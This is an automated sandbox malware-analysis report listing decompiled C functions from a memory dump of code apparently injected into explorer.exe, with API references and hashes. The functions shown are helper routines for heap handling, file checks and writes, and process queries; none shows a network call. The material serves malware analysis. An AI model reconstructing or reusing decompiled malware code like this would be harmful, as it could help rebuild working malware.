Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82

Uniqueness

Uniqueness Score: -1.00%

Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x0008b27c

APIs

GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00

Uniqueness

Uniqueness Score: -1.00%

Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}

0x000885f8
0x000885fe
0x00088603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x34fd30
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x34fd30
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x34fd30
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x34fd30
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x34fd30
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

0x0008f9c5
0x0008f9cd
0x0008f9d2
0x0008f9d8
0x0008f9de
0x0008f9f1
0x0008f9fb
0x0008fa05
0x0008fa08
0x0008fa0d
0x0008fa23
0x0008fa27
0x0008fa2c
0x0008fa2d
0x0008fa2e
0x0008fa33
0x0008fa36
0x0008fa37
0x0008fa38
0x0008fa3d
0x0008fa4c
0x0008fa51
0x0008fa56
0x0008fa5d
0x0008fa66
0x0008fa6b
0x0008fa6e
0x0008fa71
0x0008fa76
0x0008fa7c
0x0008fa81
0x0008fa86
0x0008fa89
0x0008fa9c
0x0008faa1
0x0008faa4
0x0008faa4
0x0008faac
0x0008fab7
0x0008fabc
0x0008fabf
0x0008fac2
0x0008fac2
0x0008fac8
0x0008faca
0x0008face
0x0008fad9
0x0008fade
0x0008fae3
0x00000000
0x00000000
0x0008faec
0x0008faf2
0x0008faf9
0x0008fafb
0x0008fafe
0x00000000
0x0008fafe
0x00000000
0x0008faf9
0x0008fb0b
0x0008fb14
0x0008fb18

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
Opcode Fuzzy Hash: d8e14ba9050a3f449a66642c026c32f035b024aed90037a6f4558c27f2baf7d1
Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x34f8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x34f8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x00088975
0x0008897c
0x0008897e
0x00088986
0x00088988
0x00088990
0x00088992
0x00088995
0x00088998
0x000889ac
0x000889b3
0x000889b9
0x000889c2
0x00088a1a
0x00088a1f
0x00088a28
0x00088a75
0x00088a78
0x00088a80
0x00088a84
0x00088a84
0x00088a89
0x00000000
0x00088a89
0x00088a2a
0x00088a2c
0x00088a34
0x00088a3a
0x00088a3b
0x00088a3b
0x00088a43
0x00088a46
0x00088a4b
0x00088a4b
0x00088a4e
0x00088a57
0x00088a5c
0x00088a62
0x00088a69
0x00000000
0x00088a6f
0x000889cb
0x000889d0
0x000889d2
0x000889d9
0x00000000
0x00000000
0x000889ee
0x00000000
0x000889f0
0x000889f0
0x000889fb
0x000889fe
0x00088a0b
0x00000000
0x00088a11
0x000889ee
0x0008899a
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
Opcode Fuzzy Hash: c65104c4580448df579982b77da1fe20a4a8eb4abc469e1e1d71d72c02039485
Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759

Uniqueness

Uniqueness Score: -1.00%

Function 0008E2C6, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0008E2C6(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x34fa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x34fa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0x34fab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E00088604(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x34fab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x0008e2c6
0x0008e2d9
0x0008e2e0
0x0008e2e9
0x0008e2f1
0x0008e2f7
0x0008e2fc
0x0008e307
0x0008e30c
0x0008e3a5
0x0008e3a5
0x0008e3ad
0x00000000
0x0008e3b2
0x0008e313
0x0008e316
0x0008e31d
0x0008e32d
0x0008e333
0x0008e343
0x0008e348
0x0008e34d
0x0008e354
0x0008e358
0x0008e35f
0x0008e363
0x0008e367
0x0008e368
0x0008e36b
0x0008e370
0x0008e379
0x0008e385
0x0008e38f
0x0008e394
0x0008e394
0x0008e379
0x0008e39a
0x0008e39b
0x00000000
0x0008e3a4
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 0008E394

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
Opcode Fuzzy Hash: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x0008a3ed
0x0008a3f6
0x0008a3f8
0x0008a3fa
0x0008a3fe
0x0008a400
0x0008a408
0x0008a40f
0x0008a418
0x0008a41d
0x0008a422
0x0008a446
0x0008a44b
0x0008a451
0x0008a45d
0x0008a462
0x0008a424
0x0008a42d
0x0008a443
0x00000000
0x0008a42f
0x0008a43b
0x0008a440
0x0008a42d
0x0008a422
0x0008a465
0x0008a466
0x0008a400
0x0008a470

APIs

Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0x34f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0x34f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x00085d80
0x00085d95
0x00085d9e
0x00085da7
0x00085da9
0x00085db1
0x00085dc1
0x00085dcf
0x00085dd4
0x00085dd9
0x00085ddb
0x00085ddd
0x00085de2
0x00085de4
0x00085dff
0x00085dff
0x00085de6
0x00085de7
0x00085df2
0x00085dfa
0x00085dfc
0x00085dfc
0x00085de4
0x00085e01
0x00085db3
0x00085db4
0x00085db9
0x00085dbe
0x00085dbe
0x00085e05

APIs

lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0x34fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0x34f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x0008ba0a
0x0008ba12
0x0008ba1a
0x0008ba1f
0x0008ba29
0x0008ba32
0x0008ba37
0x0008ba3c
0x0008ba5a
0x0008ba5d
0x0008ba3e
0x0008ba41
0x0008ba43
0x0008ba4b
0x0008ba4b
0x0008ba4e
0x0008ba4e
0x0008ba61
0x0008ba22
0x0008ba22
0x0008ba22

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51

Uniqueness

Uniqueness Score: -1.00%

Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x00085cec
0x00085cec
0x00085cef
0x00085cfe
0x00085d03
0x00085d08
0x00085d0f
0x00085d15
0x00085d1b
0x00085d21
0x00085d26
0x00085d2b
0x00085d33
0x00085d3d
0x00085d4b
0x00085d53
0x00085d5f
0x00085d67
0x00085d6c
0x00085d72
0x00085d7c

APIs

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

memset.MSVCRT ref: 00085D5F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}

0x0008861d
0x00088622
0x00088668
0x00088668
0x00088625
0x00088629
0x0008862b
0x0008862e
0x00088634
0x00088642
0x00088646
0x00088646
0x00088636
0x00088637
0x0008863c
0x0008864f
0x00088660
0x00088660
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0008a786
0x0008a787
0x0008a78c
0x0008a790
0x0008a79f
0x0008a7a7
0x0008a7b4
0x00000000
0x0008a7b7
0x0008a7ab
0x00000000
0x0008a7ab
0x00000000

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2

Uniqueness

Uniqueness Score: -1.00%

Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0x34f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0x34f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x0008b337
0x0008b33f
0x0008b344
0x0008b34a
0x0008b34e
0x0008b350
0x0008b355
0x0008b35e
0x0008b362
0x0008b362
0x0008b36a
0x00000000
0x0008b36d
0x0008b371

APIs

